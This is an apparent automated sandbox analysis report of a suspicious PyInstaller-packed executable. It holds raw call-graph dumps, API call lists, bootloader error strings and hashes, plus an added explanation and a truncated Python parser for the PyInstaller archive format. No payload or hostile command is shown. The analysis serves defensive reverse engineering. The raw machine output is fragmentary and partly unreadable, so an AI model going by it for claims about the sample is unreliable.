MultiByteToWideChar 18661->18663 18664 f569fa MultiByteToWideChar 18662->18664 18665 f569b4 18663->18665 18670 f569cb 18663->18670 18666 f56a13 18664->18666 18667 f56a2a 18664->18667 18679 f52290 GetLastError 18665->18679 18671 f52290 51 API calls 18666->18671 18667->18493 18670->18664 18672 f569df 18670->18672 18673 f56a22 18671->18673 18674 f52290 51 API calls 18672->18674 18673->18493 18675 f569ee 18674->18675 18675->18493 19030 f5f3dc 18676->19030 18680 f522d5 18679->18680 18691 f5e312 18680->18691 18724 f5bfb2 18691->18724 18694 f565b0 18695 f565ba __wsopen_s 18694->18695 18696 f565d3 GetLastError 18695->18696 18697 f565d9 FormatMessageW 18695->18697 18696->18697 18698 f565fc 18697->18698 18699 f56628 18697->18699 18700 f52290 51 API calls 18698->18700 19015 f56a30 18699->19015 18702 f5660b 18700->18702 18704 f596fa _ValidateLocalCookies 5 API calls 18702->18704 18706 f56621 18704->18706 18725 f5bff2 18724->18725 18726 f5bfda 18724->18726 18725->18726 18728 f5bffa 18725->18728 18727 f5e619 _free 14 API calls 18726->18727 18729 f5bfdf 18727->18729 18730 f5c80e _mbstowcs 37 API calls 18728->18730 18731 f63b33 __fread_nolock 25 API calls 18729->18731 18733 f5c00a 18730->18733 18737 f5bfea 18731->18737 18732 f596fa _ValidateLocalCookies 5 API calls 18734 f522e3 18732->18734 18739 f5cb0f 18733->18739 18734->18694 18737->18732 18755 f5e044 18739->18755 18741 f5c091 18752 f5c891 18741->18752 18742 f5cb2f 18743 f5e619 _free 14 API calls 18742->18743 18744 f5cb34 18743->18744 18745 f63b33 __fread_nolock 25 API calls 18744->18745 18745->18741 18746 f5cb20 18746->18741 18746->18742 18762 f5cdb9 18746->18762 18770 f5d642 18746->18770 18775 f5cea0 18746->18775 18780 f5ceed 18746->18780 18809 f5d1b3 18746->18809 18753 f63b77 _free 14 API calls 18752->18753 18754 f5c8a1 18753->18754 18754->18737 18756 f5e05c 18755->18756 18757 f5e049 18755->18757 18756->18746 18758 f5e619 _free 14 API calls 18757->18758 18759 f5e04e 18758->18759 18760 f63b33 __fread_nolock 25 API calls 
18759->18760 18761 f5e059 18760->18761 18761->18746 18831 f5cdf7 18762->18831 18764 f5cdbe 18771 f5d652 18770->18771 18772 f5d64b 18770->18772 18771->18746 18840 f5ca25 18772->18840 18776 f5ceb0 18775->18776 18777 f5cea9 18775->18777 18776->18746 18778 f5ca25 40 API calls 18777->18778 18779 f5ceaf 18778->18779 18779->18746 18781 f5cef4 18780->18781 18782 f5cf0e 18780->18782 18783 f5cf3e 18781->18783 18784 f5d1cc 18781->18784 18785 f5d238 18781->18785 18782->18783 18786 f5e619 _free 14 API calls 18782->18786 18783->18746 18797 f5d20f 18784->18797 18800 f5d1d8 18784->18800 18788 f5d23f 18785->18788 18789 f5d27e 18785->18789 18785->18797 18787 f5cf2a 18786->18787 18790 f63b33 __fread_nolock 25 API calls 18787->18790 18793 f5d1e6 18788->18793 18794 f5d244 18788->18794 18899 f5dee9 18789->18899 18791 f5cf35 18790->18791 18791->18746 18806 f5d1f4 18793->18806 18808 f5d208 18793->18808 18893 f5d7b0 18793->18893 18794->18797 18799 f5d249 18794->18799 18797->18806 18797->18808 18884 f5db91 18797->18884 18798 f5d21f 18798->18808 18870 f5da68 18798->18870 18800->18793 18800->18798 18800->18806 18806->18808 18902 f5e0e6 18806->18902 18808->18746 18810 f5d1cc 18809->18810 18811 f5d238 18809->18811 18819 f5d20f 18810->18819 18821 f5d1d8 18810->18821 18812 f5d23f 18811->18812 18813 f5d27e 18811->18813 18811->18819 18814 f5d244 18812->18814 18823 f5d1e6 18812->18823 18815 f5dee9 26 API calls 18813->18815 18818 f5d249 18814->18818 18814->18819 18828 f5d1f4 18815->18828 18816 f5db91 26 API calls 18816->18828 18817 f5d7b0 40 API calls 18817->18828 18822 f5d25c 18818->18822 18824 f5d24e 18818->18824 18819->18816 18819->18828 18830 f5d208 18819->18830 18820 f5d21f 18826 f5da68 39 API calls 18820->18826 18820->18830 18821->18820 18821->18823 18821->18828 18825 f5de37 25 API calls 18822->18825 18823->18817 18823->18828 18823->18830 18827 f5deab 26 API calls 18824->18827 18824->18830 18825->18828 18826->18828 18827->18828 18829 f5e0e6 39 API calls 18828->18829 18828->18830 18829->18830 
18830->18746 18834 f5ce3c 18831->18834 18833 f5ce03 18833->18764 18835 f5ce5e _mbstowcs 18834->18835 18836 f5e619 _free 14 API calls 18835->18836 18839 f5ce95 18835->18839 18837 f5ce8a 18836->18837 18839->18833 18841 f5ca37 18840->18841 18842 f5ca3c 18840->18842 18843 f5e619 _free 14 API calls 18841->18843 18848 f65c0b 18842->18848 18843->18842 18849 f65c26 18848->18849 18885 f5dba4 18884->18885 18886 f5dbbf 18885->18886 18888 f5dbd6 18885->18888 18894 f5d7c9 18893->18894 18900 f5db91 26 API calls 18899->18900 18901 f5df00 18900->18901 18901->18806 19016 f56a98 19015->19016 19017 f56a3a WideCharToMultiByte 19015->19017 19018 f56a9c WideCharToMultiByte 19016->19018 19019 f56a56 19017->19019 19020 f56a6d 19017->19020 19021 f56ad0 19018->19021 19022 f56ab9 19018->19022 19023 f52290 51 API calls 19019->19023 19020->19018 19027 f56a81 19020->19027 19033 f5f3e8 ___scrt_is_nonwritable_in_current_image 19030->19033 19031 f5f3ef 19032 f5e619 _free 14 API calls 19031->19032 19034 f5f3f4 19032->19034 19033->19031 19035 f5f411 19033->19035 19036 f63b33 __fread_nolock 25 API calls 19034->19036 19037 f5f416 19035->19037 19038 f5f423 19035->19038 19041 f53613 19036->19041 19039 f5e619 _free 14 API calls 19037->19039 19047 f63d66 19038->19047 19039->19041 19041->18498 19048 f63d72 ___scrt_is_nonwritable_in_current_image 19047->19048 19059 f68793 EnterCriticalSection 19048->19059 19050 f63d80 19060 f63e0a 19050->19060 19059->19050 19069 f63e2d 19060->19069 19061 f63d8d 19073 f63dc6 19061->19073 19062 f63e85 19063 f67024 __dosmaperr 14 API calls 19062->19063 19064 f63e8e 19063->19064 19069->19061 19069->19062 19076 f5e52c EnterCriticalSection 19069->19076 19077 f5e540 LeaveCriticalSection 19069->19077 19084 f687db LeaveCriticalSection 19073->19084 19075 f5f42c 19076->19069 19077->19069 19084->19075 19088 f5e62c 19086->19088 19087 f663ab __dosmaperr 14 API calls 19087->19088 19088->19086 19088->19087 19089 f67024 __dosmaperr 14 API calls 19088->19089 19090 f63b77 _free 14 API calls 
19088->19090 19092 f52236 19088->19092 19093 f63b43 __wsopen_s 11 API calls 19088->19093 19094 f67692 19088->19094 19089->19088 19090->19088 19092->18508 19093->19088 16503 f59935 16512 f5a032 GetModuleHandleW 16503->16512 16506 f59941 16508 f5994c 16506->16508 16514 f62849 16506->16514 16507 f59973 16517 f62867 16507->16517 16513 f5993d 16512->16513 16513->16506 16513->16507 16520 f62741 16514->16520 16518 f62741 _mbstowcs 23 API calls 16517->16518 16519 f5997b 16518->16519 16521 f62761 16520->16521 16522 f6274f 16520->16522 16538 f62607 16521->16538 16523 f5a032 _mbstowcs GetModuleHandleW 16522->16523 16525 f62754 16523->16525 16525->16521 16532 f627e7 GetModuleHandleExW 16525->16532 16527 f6279a 16527->16508 16533 f62806 GetProcAddress 16532->16533 16534 f62829 16532->16534 16537 f6281b 16533->16537 16535 f6282f FreeLibrary 16534->16535 16536 f62760 16534->16536 16535->16536 16536->16521 16537->16534 16539 f62613 ___scrt_is_nonwritable_in_current_image 16538->16539 16554 f68793 EnterCriticalSection 16539->16554 16541 f6261d 16555 f62654 16541->16555 16543 f6262a 16559 f62648 16543->16559 16546 f627a5 16615 f6a500 GetPEB 16546->16615 16549 f627d4 16552 f627e7 _mbstowcs 3 API calls 16549->16552 16550 f627b4 GetPEB 16550->16549 16551 f627c4 GetCurrentProcess TerminateProcess 16550->16551 16551->16549 16553 f627dc ExitProcess 16552->16553 16554->16541 16556 f62660 ___scrt_is_nonwritable_in_current_image 16555->16556 16558 f626c1 _mbstowcs 16556->16558 16562 f62cc6 16556->16562 16558->16543 16614 f687db LeaveCriticalSection 16559->16614 16561 f62636 16561->16527 16561->16546 16565 f629f7 16562->16565 16566 f62a03 ___scrt_is_nonwritable_in_current_image 16565->16566 16573 f68793 EnterCriticalSection 16566->16573 16568 f62a11 16574 f62bd6 16568->16574 16573->16568 16575 f62bf5 16574->16575 16576 f62a1e 16574->16576 16575->16576 16581 f63b77 16575->16581 16578 f62a46 16576->16578 16613 f687db LeaveCriticalSection 16578->16613 16580 f62a2f 16580->16558 16582 f63b82 
RtlFreeHeap 16581->16582 16583 f63bab _free 16581->16583 16582->16583 16584 f63b97 16582->16584 16583->16576 16587 f5e619 16584->16587 16590 f663ab GetLastError 16587->16590 16591 f663c2 16590->16591 16592 f663c8 16590->16592 16613->16580 16614->16561 16616 f6a51a 16615->16616 16617 f627af 16615->16617 16619 f67233 16616->16619 16617->16549 16617->16550 16622 f671b0 16619->16622 16623 f671de 16622->16623 16628 f671da 16622->16628 16623->16628 16629 f670e9 16623->16629 16628->16617 16634 f670fa ___vcrt_FlsGetValue 16629->16634 21993 f695b4 22004 f6ec7a 21993->22004 21995 f695b9 ___scrt_is_nonwritable_in_current_image 22010 f68793 EnterCriticalSection 21995->22010 21997 f69638 22015 f69657 21997->22015 22001 f695d5 22001->21997 22003 f5b5e5 65 API calls 22001->22003 22011 f5e52c EnterCriticalSection 22001->22011 22012 f6962e 22001->22012 22003->22001 22005 f6ec95 22004->22005 22006 f63b77 _free 14 API calls 22005->22006 22007 f6eca8 22005->22007 22006->22005 22008 f63b77 _free 14 API calls 22007->22008 22009 f6ecd1 22007->22009 22008->22007 22009->21995 22010->22001 22011->22001 22018 f5e540 LeaveCriticalSection 22012->22018 22014 f69636 22014->22001 22019 f687db LeaveCriticalSection 22015->22019 22017 f69644 22018->22014 22019->22017 17339 f65835 17357 f62f81 17339->17357 17341 f65842 17342 f6584e 17341->17342 17343 f6586a 17341->17343 17344 f5e619 _free 14 API calls 17342->17344 17345 f65885 17343->17345 17346 f65878 17343->17346 17347 f65853 17344->17347 17352 f65898 17345->17352 17375 f659f1 17345->17375 17348 f5e619 _free 14 API calls 17346->17348 17348->17347 17352->17347 17356 f658fa 17352->17356 17383 f65a81 17352->17383 17364 f65925 17356->17364 17358 f62fa2 17357->17358 17359 f62f8d 17357->17359 17358->17341 17360 f5e619 _free 14 API calls 17359->17360 17361 f62f92 17360->17361 17362 f63b33 __fread_nolock 25 API calls 17361->17362 17363 f62f9d 17362->17363 17363->17341 17365 f62f81 __fread_nolock 25 API calls 17364->17365 17366 f65934 17365->17366 17367 
f659d7 17366->17367 17368 f65947 17366->17368 17369 f65569 __wsopen_s 62 API calls 17367->17369 17370 f65964 17368->17370 17373 f65988 17368->17373 17372 f65908 17369->17372 17394 f65569 17370->17394 17373->17372 17419 f64bc2 17373->17419 17376 f65a07 17375->17376 17377 f65a0b 17375->17377 17376->17352 17378 f60aa8 __wsopen_s 25 API calls 17377->17378 17382 f65a5a 17377->17382 17379 f65a2c 17378->17379 17380 f65a34 SetFilePointerEx 17379->17380 17379->17382 17381 f65a4b GetFileSizeEx 17380->17381 17380->17382 17381->17382 17382->17352 17384 f65a8d 17383->17384 17385 f62f81 __fread_nolock 25 API calls 17384->17385 17388 f658ed 17384->17388 17386 f65aa8 17385->17386 17387 f6b43e __fread_nolock 25 API calls 17386->17387 17387->17388 17388->17356 17389 f6b494 17388->17389 17390 f67024 __dosmaperr 14 API calls 17389->17390 17391 f6b4b1 17390->17391 17392 f63b77 _free 14 API calls 17391->17392 17393 f6b4bb 17392->17393 17393->17356 17395 f65575 ___scrt_is_nonwritable_in_current_image 17394->17395 17396 f65595 17395->17396 17397 f6557d 17395->17397 17398 f65630 17396->17398 17403 f655c7 17396->17403 17399 f5e606 __dosmaperr 14 API calls 17397->17399 17400 f5e606 __dosmaperr 14 API calls 17398->17400 17401 f65582 17399->17401 17402 f65635 17400->17402 17404 f5e619 _free 14 API calls 17401->17404 17405 f5e619 _free 14 API calls 17402->17405 17422 f6082c EnterCriticalSection 17403->17422 17407 f6558a 17404->17407 17408 f6563d 17405->17408 17407->17372 17410 f63b33 __fread_nolock 25 API calls 17408->17410 17409 f655cd 17411 f655fe 17409->17411 17412 f655e9 17409->17412 17410->17407 17423 f6565b 17411->17423 17413 f5e619 _free 14 API calls 17412->17413 17415 f655ee 17413->17415 17417 f5e606 __dosmaperr 14 API calls 17415->17417 17416 f655f9 17467 f65628 17416->17467 17417->17416 17560 f64a3a 17419->17560 17422->17409 17424 f6567d 17423->17424 17438 f65699 17423->17438 17425 f65681 17424->17425 17427 f656d1 17424->17427 17426 f5e606 __dosmaperr 14 API calls 17425->17426 17428 
f65686 17426->17428 17433 f656e7 17427->17433 17477 f64bdd 17427->17477 17429 f5e619 _free 14 API calls 17428->17429 17470 f65202 17433->17470 17438->17416 17559 f608e1 LeaveCriticalSection 17467->17559 17469 f6562e 17469->17407 17520 f6b43e 17470->17520 17529 f64b46 17477->17529 17538 f60aa8 17529->17538 17559->17469 17561 f64a46 ___scrt_is_nonwritable_in_current_image 17560->17561 17562 f64a66 17561->17562 17563 f64a4e 17561->17563 17565 f64b17 17562->17565 17569 f64a9b 17562->17569 17564 f5e606 __dosmaperr 14 API calls 17563->17564 17567 f64a53 17564->17567 17566 f5e606 __dosmaperr 14 API calls 17565->17566 17568 f64b1c 17566->17568 17570 f5e619 _free 14 API calls 17567->17570 17571 f5e619 _free 14 API calls 17568->17571 17585 f6082c EnterCriticalSection 17569->17585 17584 f64a5b 17570->17584 17573 f64b24 17571->17573 17575 f63b33 __fread_nolock 25 API calls 17573->17575 17574 f64aa1 17576 f64ac5 17574->17576 17577 f64ada 17574->17577 17575->17584 17578 f5e619 _free 14 API calls 17576->17578 17579 f64b46 __wsopen_s 27 API calls 17577->17579 17580 f64aca 17578->17580 17581 f64ad5 17579->17581 17582 f5e606 __dosmaperr 14 API calls 17580->17582 17586 f64b0f 17581->17586 17582->17581 17584->17372 17585->17574 17589 f608e1 LeaveCriticalSection 17586->17589 17588 f64b15 17588->17584 17589->17588 22506 f62932 22509 f628b9 22506->22509 22510 f628c5 ___scrt_is_nonwritable_in_current_image 22509->22510 22517 f68793 EnterCriticalSection 22510->22517 22512 f628fd 22518 f6291b 22512->22518 22513 f628cf 22513->22512 22515 f6ac46 _mbstowcs 14 API calls 22513->22515 22515->22513 22517->22513 22521 f687db LeaveCriticalSection 22518->22521 22520 f62909 22521->22520 22522 f5973b 22523 f59743 22522->22523 22539 f5f6a3 22523->22539 22525 f5974e 22546 f59c32 22525->22546 22527 f59ee1 4 API calls 22529 f597e5 22527->22529 22528 f59763 __RTC_Initialize 22537 f597c0 22528->22537 22552 f59dbf 22528->22552 22531 f5977c 22531->22537 22555 f59e76 InitializeSListHead 22531->22555 22533 
f59792 22556 f59e85 22533->22556 22535 f597b5 22562 f62959 22535->22562 22537->22527 22538 f597dd 22537->22538 22540 f5f6d5 22539->22540 22541 f5f6b2 22539->22541 22540->22525 22541->22540 22542 f5e619 _free 14 API calls 22541->22542 22543 f5f6c5 22542->22543 22544 f63b33 __fread_nolock 25 API calls 22543->22544 22545 f5f6d0 22544->22545 22545->22525 22547 f59c42 22546->22547 22548 f59c3e 22546->22548 22549 f59ee1 4 API calls 22547->22549 22551 f59c4f ___scrt_release_startup_lock 22547->22551 22548->22528 22550 f59cb8 22549->22550 22551->22528 22569 f59d92 22552->22569 22555->22533 22604 f62e8c 22556->22604 22558 f59e9d 22558->22535 22559 f59e96 22559->22558 22560 f59ee1 4 API calls 22559->22560 22561 f59ea5 22560->22561 22570 f59da1 22569->22570 22571 f59da8 22569->22571 22575 f62cb0 22570->22575 22578 f62d1c 22571->22578 22574 f59da6 22574->22531 22576 f62d1c 28 API calls 22575->22576 22577 f62cc2 22576->22577 22577->22574 22581 f62a52 22578->22581 22582 f62a5e ___scrt_is_nonwritable_in_current_image 22581->22582 22589 f68793 EnterCriticalSection 22582->22589 22584 f62a6c 22590 f62aad 22584->22590 22586 f62a79 22600 f62aa1 22586->22600 22589->22584 22591 f62ac9 22590->22591 22596 f62b40 __dosmaperr 22590->22596 22592 f62b20 22591->22592 22593 f6ac96 28 API calls 22591->22593 22591->22596 22594 f6ac96 28 API calls 22592->22594 22592->22596 22595 f62b16 22593->22595 22597 f62b36 22594->22597 22599 f63b77 _free 14 API calls 22595->22599 22596->22586 22598 f63b77 _free 14 API calls 22597->22598 22598->22596 22599->22592 22603 f687db LeaveCriticalSection 22600->22603 22602 f62a8a 22602->22574 22603->22602 22605 f62eaa 22604->22605 22609 f62eca 22604->22609 22606 f5e619 _free 14 API calls 22605->22606 22607 f62ec0 22606->22607 22608 f63b33 __fread_nolock 25 API calls 22607->22608 22608->22609 22609->22559 18296 f648a5 18297 f648b2 18296->18297 18300 f648ca 18296->18300 18298 f5e619 _free 14 API calls 18297->18298 18299 f648b7 18298->18299 18301 f63b33 __fread_nolock 25 

Control-flow Graph (executed / not-executed node graph not reproduced)
APIs
• GetTimeZoneInformation.KERNELBASE(?,?,00000000,?,?,00000000,?,?,?,?,?,?,00F6DB54,?,?,00000000), ref: 00F6D9A5
• _free.LIBCMT ref: 00F6D993
  • Part of subcall function 00F63B77: RtlFreeHeap.NTDLL(00000000,00000000,?,00F62C8E), ref: 00F63B8D
  • Part of subcall function 00F63B77: GetLastError.KERNEL32(?,?,00F62C8E), ref: 00F63B9F
• _free.LIBCMT ref: 00F6DB5D
Strings
Memory Dump Source
• Source File: 00000000.00000002.1552781712.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
• Associated: 00000000.00000002.1552644504.0000000000F50000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1552882128.0000000000F73000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1552907895.0000000000F80000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1552907895.0000000000F8F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1552984840.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_f50000_ceFgl3jkkk.jbxd
Similarity
• API ID: _free$ErrorFreeHeapInformationLastTimeZone
• String ID: Eastern Standard Time$Eastern Summer Time
• API String ID: 2155170405-239921721
• Opcode ID: 45c5749a6ab7fccdc540e9746cd5d4ba24649f470c1dd7bc3f9fa6649ea75e72
• Instruction ID: 04cdd94319d99f13b46b070cb419296252cf97df02765f477dc7c1855cc33a78
• Opcode Fuzzy Hash: 45c5749a6ab7fccdc540e9746cd5d4ba24649f470c1dd7bc3f9fa6649ea75e72
• Instruction Fuzzy Hash: 3D512C72E00219AFDB10BFB4DC05AAE7B78EF45320F114265F814A7162E7749E44FB91

Control-flow Graph (executed / not-executed node graph not reproduced)
APIs
• FindFirstFileExW.KERNELBASE(?,00000000,?,00000000,00000000,00000000), ref: 00F6042B
• GetLastError.KERNEL32 ref: 00F60438
  • Part of subcall function 00F60624: FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,00F604A8,?), ref: 00F60649
  • Part of subcall function 00F60624: SystemTimeToTzSpecificLocalTime.KERNELBASE(00000000,?,00F604A8,?,?,?,?,00F604A8,?), ref: 00F6065D
• FindNextFileW.KERNELBASE(?,?,?), ref: 00F6055A
• GetLastError.KERNEL32 ref: 00F60564
Memory Dump Source
• Source File: 00000000.00000002.1552781712.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
• Associated: 00000000.00000002.1552644504.0000000000F50000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1552882128.0000000000F73000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1552907895.0000000000F80000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1552907895.0000000000F8F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1552984840.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_f50000_ceFgl3jkkk.jbxd
Similarity
• API ID: Time$File$ErrorFindLastSystem$FirstLocalNextSpecific
• String ID:
• API String ID: 3693236040-0
• Opcode ID: 1ef43ae719ea4d41e39593a6c510343d3422047d9851d5b72f8589d419d356f9
• Instruction ID: 0ae6789b775f2cab069fe7cd0f2c318e5b4abd73dd0ef3a09e83c59c552c8d7b
• Opcode Fuzzy Hash: 1ef43ae719ea4d41e39593a6c510343d3422047d9851d5b72f8589d419d356f9
• Instruction Fuzzy Hash: E551D7B19006189FCB35EFB4CC85AABB7E8AF44314F240A56E516C7281EF78DE44AF50
                                                                                                                      APIs
                                                                                                                      • GetCurrentProcess.KERNEL32(?,?,00F627A4,?,?,?,?,?,00F5C00A), ref: 00F627C7
                                                                                                                      • TerminateProcess.KERNEL32(00000000,?,00F627A4,?,?,?,?,?,00F5C00A), ref: 00F627CE
                                                                                                                      • ExitProcess.KERNEL32 ref: 00F627E0
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1552781712.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
• Associated: 00000000.00000002.1552644504.0000000000F50000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1552882128.0000000000F73000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1552907895.0000000000F80000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1552907895.0000000000F8F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1552984840.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_f50000_ceFgl3jkkk.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Process$CurrentExitTerminate
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1703294689-0
                                                                                                                      • Opcode ID: 0b6b6f1089981358f8e89a7c8722e8e47401efdfd1f8d5fa4a1b7ba3537c6626
                                                                                                                      • Instruction ID: ed649b7f3ef905d911cfbafec6c0ba88809bbd567e01d6bedf1300f94c5e6612
                                                                                                                      • Opcode Fuzzy Hash: 0b6b6f1089981358f8e89a7c8722e8e47401efdfd1f8d5fa4a1b7ba3537c6626
                                                                                                                      • Instruction Fuzzy Hash: 4FE04631400548EFCF11AF24CC48D083B68EB00351B004520F80A8A532CB39EE81FB91
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1552781712.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
• Associated: 00000000.00000002.1552644504.0000000000F50000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1552882128.0000000000F73000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1552907895.0000000000F80000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1552907895.0000000000F8F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1552984840.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_f50000_ceFgl3jkkk.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 900c08fc981e5ef944cc89794b80ef5ed10540dc5ba515face4f6b17785decd5
                                                                                                                      • Instruction ID: 50dbc74f2589089a0f664e743bf123a00f88265fa4325fb2003e0b7cffeda9f2
                                                                                                                      • Opcode Fuzzy Hash: 900c08fc981e5ef944cc89794b80ef5ed10540dc5ba515face4f6b17785decd5
                                                                                                                      • Instruction Fuzzy Hash: 00E0EC72A15228EBCB25DB98CE5499AF3ECEB45B54B154496F502E3211C274DE00DBD1

Control-flow Graph: the rendered graph is not preserved in this export; this function's API (__fread_nolock) and its cookie/TOC strings are listed under Similarity below.
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1552781712.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
• Associated: 00000000.00000002.1552644504.0000000000F50000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1552882128.0000000000F73000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1552907895.0000000000F80000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1552907895.0000000000F8F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1552984840.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_f50000_ceFgl3jkkk.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: __fread_nolock
                                                                                                                      • String ID: Cannot read Table of Contents.$Could not allocate buffer for TOC!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$fread$fseek$malloc
                                                                                                                      • API String ID: 2638373210-4158440160
                                                                                                                      • Opcode ID: 16c3acf06c030273789f5fab58a663d5feaed36387aa3a9e0eff2e242480517d
                                                                                                                      • Instruction ID: 5ecc2a3e2051054b1bfb9eef16c1b2163bd7af2362ac5ce5d6a4da7e54919e3e
                                                                                                                      • Opcode Fuzzy Hash: 16c3acf06c030273789f5fab58a663d5feaed36387aa3a9e0eff2e242480517d
                                                                                                                      • Instruction Fuzzy Hash: 2F51E771A007009BC718DF28DC46A16B7E1BF48322F548A2DFA4EC3691E675E54CEB43

Control-flow Graph (executed and not-executed blocks; graph image not preserved in this export): the function spans f51420-f5160c and calls f55a40, f55d10, f5bd15, f535c0, f52340, f51040, f5e380, f5b91e, f5bf4f, f5e365 and f5b65c. f521e0 is called from the blocks that follow the "Failed to extract %s" strings for open target file (f51466), seek (f514d7), allocate (f51523) and read/write chunk (f515be/f515ae); the open-archive failure at f514a5 goes through f52340 instead.
                                                                                                                      Strings
                                                                                                                      • malloc, xrefs: 00F51528
                                                                                                                      • Failed to extract %s: failed to open archive file!, xrefs: 00F514A5
                                                                                                                      • fopen, xrefs: 00F5146B
                                                                                                                      • Failed to extract %s: failed to allocate temporary buffer!, xrefs: 00F51523
                                                                                                                      • Failed to extract %s: failed to seek to the entry's data!, xrefs: 00F514D7
                                                                                                                      • Failed to extract %s: failed to read data chunk!, xrefs: 00F515BE
                                                                                                                      • fread, xrefs: 00F515C3
                                                                                                                      • Failed to extract %s: failed to open target file!, xrefs: 00F51466
                                                                                                                      • Failed to extract %s: failed to write data chunk!, xrefs: 00F515AE
                                                                                                                      • fwrite, xrefs: 00F515B3
                                                                                                                      • fseek, xrefs: 00F514DC
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1552781712.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
• Associated: 00000000.00000002.1552644504.0000000000F50000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1552882128.0000000000F73000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1552907895.0000000000F80000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1552907895.0000000000F8F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1552984840.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_f50000_ceFgl3jkkk.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: Failed to extract %s: failed to allocate temporary buffer!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to open target file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$Failed to extract %s: failed to write data chunk!$fopen$fread$fseek$fwrite$malloc
                                                                                                                      • API String ID: 0-666925554
                                                                                                                      • Opcode ID: 1e6bf7b924d69f67a83b75b114bc6609f55c22b1bb81876c1e645a4ed79d867f
                                                                                                                      • Instruction ID: 96207dbf7a00217aa2da507d7a371771fc96c37ba47a9ff36addc99ef167012b
                                                                                                                      • Opcode Fuzzy Hash: 1e6bf7b924d69f67a83b75b114bc6609f55c22b1bb81876c1e645a4ed79d867f
                                                                                                                      • Instruction Fuzzy Hash: AB4149B2E0030177EB20AE646C46B6B3655BBC0766F084625FF19562C2F775EB0CB293
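The strings in the two functions above ("MEI", "Failed to read cookie!", "Could not read full TOC!", and the "Failed to extract %s: ..." family with fopen/fseek/fread/fwrite/malloc) are the PyInstaller bootloader's CArchive reader and its per-entry extraction loop: the archive is appended to the PE, an 88-byte cookie at its end locates the table of contents, and each TOC entry names a data blob that is inflated with zlib when its compression flag is set. The following is an added example, not code from this report or from PyInstaller: a Python parser for that layout (cookie struct "!8sIIii64s", entry header "!iIIIBc" followed by a NUL-padded name), run against an archive the example constructs itself. build_archive, find_cookie, parse_archive, extract_entry, carve_all, the sample entries and the fake PE stub are assumptions of the demo; the struct layouts and type codes are those of the PyInstaller format.

```python
import struct
import zlib
from dataclasses import dataclass

# PyInstaller CArchive layout as the bootloader reads it:
#   [entry data ...][table of contents][88-byte cookie]   appended to the PE.
# The cookie is found by searching for its magic from the end of the file.
MAGIC = b"MEI\014\013\012\013\016"
COOKIE_FMT = "!8sIIii64s"   # magic, package length, TOC offset, TOC length, Python version, Python DLL name
COOKIE_SIZE = struct.calcsize(COOKIE_FMT)   # 88
ENTRY_FMT = "!iIIIBc"       # entry length, data offset, compressed size, uncompressed size, compressed?, type code
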